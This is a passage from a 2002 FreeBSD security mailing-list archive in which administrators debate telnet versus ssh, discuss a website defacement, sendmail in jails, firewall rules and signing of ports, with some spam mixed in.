It's not just your systems that you have to worry about, either, it's all those intermediate systems that your data traverses between endpoints (which you have no control over, of course) that one needs to worry about. They can be broken into and used as sniffing points. Alas, this info is not new. As long as OpenSSH exploits are fixed in a timely fashion, I consider sshd to be MUCH more secure than telnetd. The zlib bug argument is pretty weak. As far as 'backwards-compatibility' goes, if an older system can't be upgraded to allow encrypted connectivity, it needs to be replaced by one that can. The idea here is to promote security and secure alternatives, and not archaic non-secure protocols/methods. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 16:31:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 95BB337B401 for ; Mon, 6 May 2002 16:31:42 -0700 (PDT) Received: (qmail 10542 invoked by uid 1000); 6 May 2002 23:31:42 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 6 May 2002 23:31:42 -0000 Date: Mon, 6 May 2002 16:31:42 -0700 (PDT) From: Jason Stone X-X-Sender: To: Subject: Re: Telnet Exploit In-Reply-To: Message-ID: <20020506162611.R6630-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > > Why? Do you think ssh is more secure? It may not be. Just think > > about the complexity of ssh. > > Are you for real? Have you ever sniffed a connection between two > machines using ssldump? When looking at a telnet or ftp connection, > it shows everything, clear as day. 
"Blah blah you'd have to be crazy to use telnet, it's plaintext! Use ssh!" "Except blah blah ipsec, telnet-over-ssl, etc, openssh has a history of bad bugs, push crypto down out of the application layer and keep your high-layer apps simple!" This thread is not new, and not especially relevent here. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE81xJeswXMWWtptckRAtVaAJ9PIBl+DhXVigcMJvrlwwxpkY8iaQCfaVns mKOJKttWcilCZMbmrs1xLDA= =olIv -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 17: 5:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from asimov.fdn.uq.edu.au (asimov.fdn.uq.edu.au [203.15.61.193]) by hub.freebsd.org (Postfix) with ESMTP id 4F44637B400 for ; Mon, 6 May 2002 17:05:46 -0700 (PDT) Received: from ACE01 (staff23.fdn.uq.edu.au [203.15.61.152]) by asimov.fdn.uq.edu.au (8.12.3/8.12.3) with SMTP id g4705gKB029390 for ; Tue, 7 May 2002 10:05:43 +1000 (EST) (envelope-from uqafarru@fdn.uq.edu.au) From: "Adam Farrugia" To: Subject: Date: Tue, 7 May 2002 10:02:34 +1000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0002_01C1F5AE.4F7448A0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MS-TNEF-Correlator: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: 
(Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0002_01C1F5AE.4F7448A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit freebsd-security ------=_NextPart_000_0002_01C1F5AE.4F7448A0 Content-Type: application/ms-tnef; name="winmail.dat" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="winmail.dat" 
------=_NextPart_000_0002_01C1F5AE.4F7448A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 17:19:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id 2D83437B401 for ; Mon, 6 May 2002 17:19:47 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g470Jkuk013512 for ; Mon, 6 May 2002 20:19:46 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Mon, 6 May 2002 20:19:41 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: Telnet Exploit In-Reply-To: <200205062103.g46L39R3024026@borja.sarenet.es> Message-ID: <20020506201808.V13363-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 6 May 2002, Borja Marcos wrote: > On Monday 06 May 2002 21:37, you wrote: > > Why in the world are you using telnetd anyhow? You should be using SSHD > > and never telnetd. Telnetd should be 'forbidden'... > > Why? Do you think ssh is more secure? It may not be. Just think about the > complexity of ssh. It has been hit by a bug in zlib, for example. Or has zlib Not vulnerable on FreeBSD unless you have phk_malloc configured to abort on a double-free. > had an audit as strict as ssh? > > Telnet has its problems, but we should not say that ssh is "more secure" > acritically. Yes, I think we can, if only because nothing goes over the wire in cleartext unless the user deliberately disables encryption for his or her session. 
> It is obvious that it has advantages, however. Yup. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net I was raised by a pack of wild corn dogs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 18: 0:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578012pcs.martnz01.ga.comcast.net [68.47.4.97]) by hub.freebsd.org (Postfix) with ESMTP id 5956337B413 for ; Mon, 6 May 2002 18:00:06 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g47102131809 for ; Mon, 6 May 2002 21:00:02 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CD72712.37CB5750@vortex.wa4phy.net> Date: Mon, 06 May 2002 21:00:02 -0400 From: Sam Drinkard Organization: You Gotta Be Kiddin! X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-STABLE i386) X-Accept-Language: en, ja MIME-Version: 1.0 To: security@freebsd.org Subject: Woot project Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello list, I just discovered I have been hacked on my main webpage from apparently the Woot project kiddies. I assume, right after the attack, I received an email from some outfit called alldas.org. My problem is this. According to what I have read about the woot project, access is gained by portscanning for the presence of SSH-1. I don't have SSH-1 or 2 active at the moment, so I'm wondering how access was gained. Have searched all the log files for unusual activity, and nothing is apparent so far. The message left at the bottom of my main page was: FreeBSD vortex.wa4phy.net 4.5-STABLE sexcii... 
- [sYn] of woot-project Aside from the SSH-1 vulnerabilities, are there any other known entry points associated with this cracker group? Thanks.. Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 22:19:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 4FDFF37B405 for ; Mon, 6 May 2002 22:19:17 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020507051917.XELR9799.rwcrmhc51.attbi.com@blossom.cjclark.org>; Tue, 7 May 2002 05:19:17 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g475JEv89612; Mon, 6 May 2002 22:19:14 -0700 (PDT) (envelope-from cjc) Date: Mon, 6 May 2002 22:19:14 -0700 From: "Crist J. Clark" To: "Dalin S. Owen" Cc: security@FreeBSD.ORG Subject: Re: Telnet Exploit Message-ID: <20020506221914.D89339@blossom.cjclark.org> References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> <200205061347.54915.dowen@pstis.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200205061347.54915.dowen@pstis.com>; from dowen@pstis.com on Mon, May 06, 2002 at 01:47:54PM -0600 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 01:47:54PM -0600, Dalin S. Owen wrote: > On May 6, 2002 01:37 pm, SolarfluX wrote: > > Why in the world are you using telnetd anyhow? You should be using SSHD > > and never telnetd. Telnetd should be 'forbidden'... > > So if we are going to do away with telnetd, we should scrap FTP... Definitely scrap FTP. 
Data over a separate channel is a huge PITA. And remember, friends don't let friends run wu-ftpd. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 22:23:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 01E9B37B405 for ; Mon, 6 May 2002 22:23:46 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020507052345.XHLE9799.rwcrmhc51.attbi.com@blossom.cjclark.org>; Tue, 7 May 2002 05:23:45 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g475NjF89639; Mon, 6 May 2002 22:23:45 -0700 (PDT) (envelope-from cjc) Date: Mon, 6 May 2002 22:23:44 -0700 From: "Crist J. Clark" To: SolarfluX Cc: security@FreeBSD.ORG Subject: Re: cvsup/install over ssh? Message-ID: <20020506222344.E89339@blossom.cjclark.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from solarflux@ziplip.com on Mon, May 06, 2002 at 02:05:48PM -0700 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 02:05:48PM -0700, SolarfluX wrote: > Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does? > > How about an option to install over an encrypted connection? > > Would anyone consider implementing either of these suggestions? There's built in SOCKS support. -- Crist J. 
Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 22:24:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc54.attbi.com (rwcrmhc54.attbi.com [216.148.227.87]) by hub.freebsd.org (Postfix) with ESMTP id 4515137B408 for ; Mon, 6 May 2002 22:24:39 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc54.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020507052438.VLIH2627.rwcrmhc54.attbi.com@blossom.cjclark.org>; Tue, 7 May 2002 05:24:38 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g475Ob089649; Mon, 6 May 2002 22:24:37 -0700 (PDT) (envelope-from cjc) Date: Mon, 6 May 2002 22:24:37 -0700 From: "Crist J. Clark" To: Sam Drinkard Cc: security@FreeBSD.ORG Subject: Re: Woot project Message-ID: <20020506222437.F89339@blossom.cjclark.org> References: <3CD72712.37CB5750@vortex.wa4phy.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3CD72712.37CB5750@vortex.wa4phy.net>; from sam@wa4phy.net on Mon, May 06, 2002 at 09:00:02PM -0400 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 09:00:02PM -0400, Sam Drinkard wrote: > Hello list, > > I just discovered I have been hacked on my main webpage from > apparently the Woot project kiddies. I assume, right after the attack, > I received an email from some outfit called alldas.org. My problem is > this. According to what I have read about the woot project, access is > gained by portscanning for the presence of SSH-1. 
I don't have SSH-1 or > 2 active at the moment, so I'm wondering how access was gained. Have > searched all the log files for unusual activity, and nothing is apparent > so far. The message left at the bottom of my main page was: > > FreeBSD vortex.wa4phy.net 4.5-STABLE sexcii... - [sYn] of woot-project > > Aside from the SSH-1 vulnerabilities, are there any other known > entry points associated with this cracker group? CGI bugs. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:20:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id AE0CC37B406 for ; Mon, 6 May 2002 23:20:36 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: References: <20020506094455.GA9926@kaktusas.org> Subject: Re: ipfw MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507062036.AE0CC37B406@hub.freebsd.org> Date: Mon, 6 May 2002 23:20:36 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hmmm, interesting. I wonder how stable it is. What we use in production is a script that every minute resolves MAC addresses to IPs and refreshes the rules. Yeah, it's a little hokey but it works like a charm. See http://memberwebs.com/nielsen for a tool that does the resolving. 
Nate > http://www.bsdshell.net/hut_ethfw.html > > Paulius To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:22:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id A75CE37B400 for ; Mon, 6 May 2002 23:22:32 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: References: Subject: Re: jails and sendmail MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507062232.A75CE37B400@hub.freebsd.org> Date: Mon, 6 May 2002 23:22:32 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On the host itself, I have in rc.conf: sendmail_enable="NO", instead > of "NONE", to allow cron stuff to get mail out. Good, then it won't interfere with the jails. > I'd like to have sendmail_enable="YES" in each of my jails. Right > now, sendmail doesn't seem to want to start in my jails with ="YES". I guess you aliased the jails ip when starting up? > Is it necessary to tell sendmail inside a jail to listen only on that > jail's IP? If so, how is this done? I'm hoping a line or two in the > .mc file will do it, but I'm new to editing these files. Nope, not when running in a jail. The jail code translates INADDR_ANY to just the jails ip. This is done transparently. > Is there a problem with the localhost sendmail config being shared > around the jails, since localhost really belongs to the host itself > (if I understand localhost correctly)? 
In a jail "localhost" is also mapped to the jails ip. Again transparently. Do other daemons run and can you access them from outside the jail and/or other systems? Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:25:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id E638C37B401 for ; Mon, 6 May 2002 23:25:34 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: , References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> <200205061347.54915.dowen@pstis.com> Subject: Re: Telnet Exploit MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507062534.E638C37B401@hub.freebsd.org> Date: Mon, 6 May 2002 23:25:34 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At our site we've implemented a policy of separating "secure" and "insecure" logins. We do this via a PAM module. We use SSH for shell logins exclusively. Using this PAM module we mandate that the same password/login can't be used with insecure (SMTP, FTP etc..) protocols. > So if we are going to do away with telnetd, we should scrap FTP and SMTP > then.. as they are garbage protocols. 
Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:40:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 3F16337B40A for ; Mon, 6 May 2002 23:40:23 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g476cFT03420 for ; Tue, 7 May 2002 02:38:15 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id CAA11961; Tue, 7 May 2002 02:44:34 -0400 (EDT) Date: Tue, 7 May 2002 02:44:34 -0400 (EDT) Message-Id: <200205070644.CAA11961@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. 
If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 0:12:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from web21503.mail.yahoo.com (web21503.mail.yahoo.com [66.163.169.14]) by hub.freebsd.org (Postfix) with SMTP id 0E54137B40A for ; Tue, 7 May 2002 00:12:27 -0700 (PDT) Message-ID: <20020507071226.31885.qmail@web21503.mail.yahoo.com> Received: from [204.120.48.3] by web21503.mail.yahoo.com via HTTP; Tue, 07 May 2002 00:12:26 PDT Date: Tue, 7 May 2002 00:12:26 -0700 (PDT) From: nat sheiriman To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-1231831488-1020755546=:29731" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --0-1231831488-1020755546=:29731 Content-Type: multipart/alternative; boundary="0-2136099446-1020755546=:29731" --0-2136099446-1020755546=:29731 Content-Type: text/plain; charset=us-ascii --------------------------------- Do You Yahoo!? Yahoo! Health - your guide to health and wellness --0-2136099446-1020755546=:29731 Content-Type: text/html; charset=us-ascii



Do You Yahoo!?
Yahoo! Health - your guide to health and wellness --0-2136099446-1020755546=:29731-- --0-1231831488-1020755546=:29731 Content-Type: image/pjpeg; name="freebsd.org_Is_His-God's-012101.jpg" Content-Transfer-Encoding: base64 Content-Description: freebsd.org_Is_His-God's-012101.jpg Content-Disposition: inline; filename="freebsd.org_Is_His-God's-012101.jpg" --0-1231831488-1020755546=:29731-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 0:25:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id 01D9F37B409 for ; Tue, 7 May 2002 00:23:48 -0700 (PDT) Received: from there (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with SMTP id g477NjR3025099; Tue, 7 May 2002 09:23:45 +0200 (CEST) (envelope-from borjam@sarenet.es) Message-Id: 
<200205070723.g477NjR3025099@borja.sarenet.es> Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos Organization: Sarenet S.A. To: solarflux@ziplip.com Subject: Re: Telnet Exploit Date: Tue, 7 May 2002 09:23:44 +0200 X-Mailer: KMail [version 1.3.2] References: In-Reply-To: Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 07 May 2002 01:22, you wrote: > Are you for real? Have you ever sniffed a connection between two machines Sure! > using ssldump? When looking at a telnet or ftp connection, it shows > everything, clear as day. It is obvious that ssh has many benefits. It encrypts the connection, and you can use public keys to authenticate both parties. I am not silly. > As long as OpenSSH exploits are fixed in a timely fashion, I consider sshd > to be MUCH more secure than telnetd. The zlib bug argument is pretty weak. I don't think it is weak. Software complexity is a serious danger. I would prefer a simpler ssh service without frills, subject to a design process with a strong focus on security. Do you think all the software used by OpenSSH (or other ssh implementations) has been thoroughly audited? Hey, I use ssh years ago, and I always authenticate with public keys. It is really useful, but I am worried with the current trends with software complexity and reuse. It can lead to security problems. Borja. -- __________________________________________________________________ Borja Marcos * borjam@sarenet.es Responsable de seguridad * Tel: +34 944209470 SARENET S.A. 
- * Fax: +34 944209465
Parque Tecnologico, 103 * PGP KeyID: 0x50B24B8C
48170 - Zamudio (Bizkaia) SPAIN *
__________________________________________________________________

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 7 2:40:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from frigg.inter.net.il (frigg.inter.net.il [192.114.186.16]) by hub.freebsd.org (Postfix) with ESMTP id B81D437B406 for ; Tue, 7 May 2002 02:40:17 -0700 (PDT) Received: from noused ([80.230.140.101]) by frigg.inter.net.il (Mirapoint Messaging Server MOS 3.1.0.54-GA) with SMTP id BKG08711; Tue, 7 May 2002 12:37:06 +0300 (IDT) Message-ID: <001401c1f5b2$d648bec0$658ce650@noused> From: "Retal" To: Subject: I can't see this damn message anymore Date: Tue, 7 May 2002 12:34:57 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0011_01C1F5C3.98E4BDC0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

This is a multi-part message in MIME format.

------=_NextPart_000_0011_01C1F5C3.98E4BDC0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: quoted-printable

Why I'm getting 100 messages like: you have been added you have been removed.. 100 times? 20 messages a day, damn it bothers....

Retal (retal@retal.co.il)

------=_NextPart_000_0011_01C1F5C3.98E4BDC0 Content-Type: text/html; charset="windows-1255" Content-Transfer-Encoding: quoted-printable
Retal (retal@retal.co.il) ------=_NextPart_000_0011_01C1F5C3.98E4BDC0--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 7 5:48:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 43CBF37B433 for ; Tue, 7 May 2002 05:48:12 -0700 (PDT) Received: (qmail 19798 invoked by uid 1000); 7 May 2002 12:48:33 -0000 Date: Tue, 7 May 2002 14:48:33 +0200 From: "Karsten W. Rohrbach" To: SolarfluX Cc: security@freebsd.org Subject: ports signing, Was: cvsup/install over ssh? Message-ID: <20020507144833.L15411@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , SolarfluX , security@freebsd.org References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="aiCxlS1GuupXjEh3" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from solarflux@ziplip.com on Mon, May 06, 2002 at 02:05:48PM -0700 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer X-Work-URL: http://www.ngenn.net/ X-Work-Address: nGENn GmbH, Schloss Kransberg, D-61250 Usingen-Kransberg, Germany X-Work-Phone: +49-6081-682-304 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

--aiCxlS1GuupXjEh3 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

SolarfluX(solarflux@ziplip.com)@2002.05.06 14:05:48 +0000:
> Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does?

ipsec(4)

> How about an option to install over an encrypted connection?

setkey(8)

> Would anyone consider implementing either of these suggestions?
main question: what problem do you want to solve with it?

on a high-volume download site i wouldn't even think about implementing payload signing/encryption on the network layer. the cost of cpu cycles in such an environment is much too high. as hardware gets faster and cheaper, it might become reality.

perhaps someday, there will be tokens and configuration info available for ftp.freebsd.org, but what about the mirrors? trust, authenticity, integrity must be maintained throughout the infrastructure. this is not possible through only encryption on the network layer.

in ports' distfiles, checksums are used already, but only to have control over source archive integrity, not really authenticity (this would imply the ports tree itself being signed, or elements of it, using some PKCS variant).

what i could imagine is a "checksig" target in the ports tree, but this has the following implications:
- one additional .sig/.asc file per port
- gnupg must be installed to be able to check, first (but this could already be a tampered version, that gives an "OK" every time)
- each port maintainer must have a private key and gnupg to sign his port(s)
- a publicly available web of trust containing cross-signed pubkeys of the maintainers needs to be made available (and managed)
- the maintainer's mailbox will most certainly fill up with "port is not signed" or whatelse obscure messages when the system is freshly deployed

thinking about it, it looks like worth thinking about it a little further. opinions? flames?

regards, /k

-- 
> The life uncaffeinated is not worth living.
--Michael Han
WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6
REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44
My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/
Please do not remove my address from To: and Cc: fields in mailing lists. 10x

--aiCxlS1GuupXjEh3 Content-Type: application/pgp-signature Content-Disposition: inline

